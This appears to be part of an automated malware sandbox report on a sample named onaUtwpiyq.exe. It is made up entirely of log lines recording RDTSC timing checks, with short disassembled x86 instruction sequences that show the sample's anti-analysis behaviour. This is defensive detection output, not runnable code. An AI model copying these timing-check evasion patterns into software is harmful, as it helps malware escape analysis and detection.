                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AF5579 second address: AF557D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AF57E1 second address: AF57E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AF57E5 second address: AF57EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AF57EB second address: AF580B instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF3D0D81738h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c jmp 00007FF3D0D81740h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AF5D60 second address: AF5D78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BACh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AF5D78 second address: AF5D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AF5D7C second address: AF5D80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AF5D80 second address: AF5DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF3D0D81736h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007FF3D0D8173Fh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AF5EFF second address: AF5F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AF60A3 second address: AF60BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D81744h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AF60BB second address: AF60C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jnl 00007FF3D0F68BA6h 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AEB420 second address: AEB448 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D81743h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF3D0D8173Bh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AEB448 second address: AEB453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF3D0F68BA6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AF6225 second address: AF622A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AF622A second address: AF6230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AF924D second address: AF9251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AFB23B second address: AFB242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AFB6B0 second address: AFB6B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AFA756 second address: AFA75A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AFA75A second address: AFA760 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: AFA760 second address: AFA766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: B03452 second address: B0345C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF3D0D81736h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: B0345C second address: B0348F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007FF3D0F68BB5h 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: B0348F second address: B03494 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: B028A0 second address: B028B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB3h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: B028B9 second address: B028DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3D0D81747h 0x00000009 jmp 00007FF3D0D8173Ah 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: B028DE second address: B028E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: B03C12 second address: B03C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: B04361 second address: B04366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: B04366 second address: B0436B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: B04A74 second address: B04A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF3D0F68BB5h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: B04BEC second address: B04BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jg 00007FF3D0D81736h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: B04BF8 second address: B04C0B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jg 00007FF3D0F68BA6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: B04C0B second address: B04C10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: B04DDA second address: B04DE4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF3D0F68BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: B04DE4 second address: B04DEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: B05CBD second address: B05D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF3D0F68BA8h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007FF3D0F68BB9h 0x00000013 nop 0x00000014 jmp 00007FF3D0F68BB1h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007FF3D0F68BA8h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 call 00007FF3D0F68BB9h 0x0000003a movzx esi, cx 0x0000003d pop edi 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push ecx 0x00000043 call 00007FF3D0F68BA8h 0x00000048 pop ecx 0x00000049 mov dword ptr [esp+04h], ecx 0x0000004d add dword ptr [esp+04h], 0000001Dh 0x00000055 inc ecx 0x00000056 push ecx 0x00000057 ret 0x00000058 pop ecx 0x00000059 ret 0x0000005a xchg eax, ebx 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007FF3D0F68BB8h 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: B06CAD second address: B06CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: B06CB1 second address: B06CB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: B088EB second address: B088F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: B09A5F second address: B09A69 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF3D0F68BACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: B0A53F second address: B0A543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: B0A543 second address: B0A558 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: B0A558 second address: B0A562 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF3D0D8173Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: B0A562 second address: B0A57F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF3D0F68BB3h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe | RDTSC instruction interceptor: First address: B0B111 second address: B0B11B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF3D0D8173Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B0AED6 second address: B0AEDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: ACC5A5 second address: ACC5AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF3D0D81736h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: ACC5AF second address: ACC5C1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF3D0F68BA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: ACC5C1 second address: ACC5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: ACC5C5 second address: ACC5C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B0DB29 second address: B0DB2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: ACC5C9 second address: ACC5E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FF3D0F68BB0h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B0DB2D second address: B0DB31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B1480B second address: B14815 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FF3D0F68BA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B12B3D second address: B12B4D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF3D0D81736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B14DBB second address: B14DC5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF3D0F68BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B12B4D second address: B12BED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D81741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b movsx edi, bx 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FF3D0D81738h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f mov ebx, dword ptr [ebp+122D35E3h] 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c sub ebx, dword ptr [ebp+122D3587h] 0x00000042 mov eax, dword ptr [ebp+122D0E59h] 0x00000048 jmp 00007FF3D0D8173Bh 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push ebx 0x00000052 call 00007FF3D0D81738h 0x00000057 pop ebx 0x00000058 mov dword ptr [esp+04h], ebx 0x0000005c add dword ptr [esp+04h], 00000017h 0x00000064 inc ebx 0x00000065 push ebx 0x00000066 ret 0x00000067 pop ebx 0x00000068 ret 0x00000069 mov dword ptr [ebp+124537E6h], ecx 0x0000006f push eax 0x00000070 jp 00007FF3D0D81744h 0x00000076 push eax 0x00000077 push edx 0x00000078 jg 00007FF3D0D81736h 0x0000007e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B14F80 second address: B14F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B14F86 second address: B14FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF3D0D81748h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B17E62 second address: B17EDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FF3D0F68BA8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 pushad 0x00000026 or dword ptr [ebp+122D18ECh], esi 0x0000002c or cx, AF14h 0x00000031 popad 0x00000032 push 00000000h 0x00000034 mov edi, dword ptr [ebp+122D376Fh] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ebx 0x0000003f call 00007FF3D0F68BA8h 0x00000044 pop ebx 0x00000045 mov dword ptr [esp+04h], ebx 0x00000049 add dword ptr [esp+04h], 00000017h 0x00000051 inc ebx 0x00000052 push ebx 0x00000053 ret 0x00000054 pop ebx 0x00000055 ret 0x00000056 mov dword ptr [ebp+122D1C68h], esi 0x0000005c push eax 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B17EDB second address: B17EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B18E57 second address: B18E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B18E5B second address: B18E5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B18055 second address: B1807C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007FF3D0F68BB6h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B18E5F second address: B18EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 jmp 00007FF3D0D81747h 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FF3D0D81738h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a cld 0x0000002b push 00000000h 0x0000002d mov ebx, edi 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007FF3D0D81738h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 0000001Bh 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b push ebx 0x0000004c add edi, dword ptr [ebp+122D38F7h] 0x00000052 pop edi 0x00000053 and edi, 1A69D771h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push ebx 0x0000005d pushad 0x0000005e popad 0x0000005f pop ebx 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B1814D second address: B18157 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF3D0F68BA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B18157 second address: B1815B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B19D7E second address: B19D93 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF3D0F68BACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B19FCD second address: B1A07C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF3D0D8173Ch 0x00000008 jnl 00007FF3D0D81736h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov ebx, dword ptr [ebp+122D370Fh] 0x00000019 jng 00007FF3D0D8173Ch 0x0000001f mov dword ptr [ebp+1247E12Dh], eax 0x00000025 push dword ptr fs:[00000000h] 0x0000002c call 00007FF3D0D81745h 0x00000031 push esi 0x00000032 sbb di, C95Ah 0x00000037 pop edi 0x00000038 pop edi 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 push 00000000h 0x00000042 push edx 0x00000043 call 00007FF3D0D81738h 0x00000048 pop edx 0x00000049 mov dword ptr [esp+04h], edx 0x0000004d add dword ptr [esp+04h], 00000019h 0x00000055 inc edx 0x00000056 push edx 0x00000057 ret 0x00000058 pop edx 0x00000059 ret 0x0000005a jc 00007FF3D0D81752h 0x00000060 call 00007FF3D0D81745h 0x00000065 mov dword ptr [ebp+1245335Eh], ecx 0x0000006b pop ebx 0x0000006c mov dword ptr [ebp+122D2FD0h], ecx 0x00000072 mov eax, dword ptr [ebp+122D1765h] 0x00000078 movsx edi, si 0x0000007b push FFFFFFFFh 0x0000007d mov edi, dword ptr [ebp+1247174Bh] 0x00000083 nop 0x00000084 pushad 0x00000085 pushad 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B204BE second address: B204C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B204C6 second address: B204D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FF3D0D81738h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B204D9 second address: B204DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B204DF second address: B204E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B204E3 second address: B20545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FF3D0F68BA8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 mov dword ptr [ebp+12477BCCh], edi 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007FF3D0F68BA8h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 00000014h 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 mov bh, 68h 0x00000047 push 00000000h 0x00000049 mov edi, dword ptr [ebp+122D1C68h] 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push ecx 0x00000053 jns 00007FF3D0F68BA6h 0x00000059 pop ecx 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B1F6E7 second address: B1F6EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B1E589 second address: B1E58F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B1F6EB second address: B1F70A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF3D0D81744h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B23929 second address: B2392F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B2392F second address: B23936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
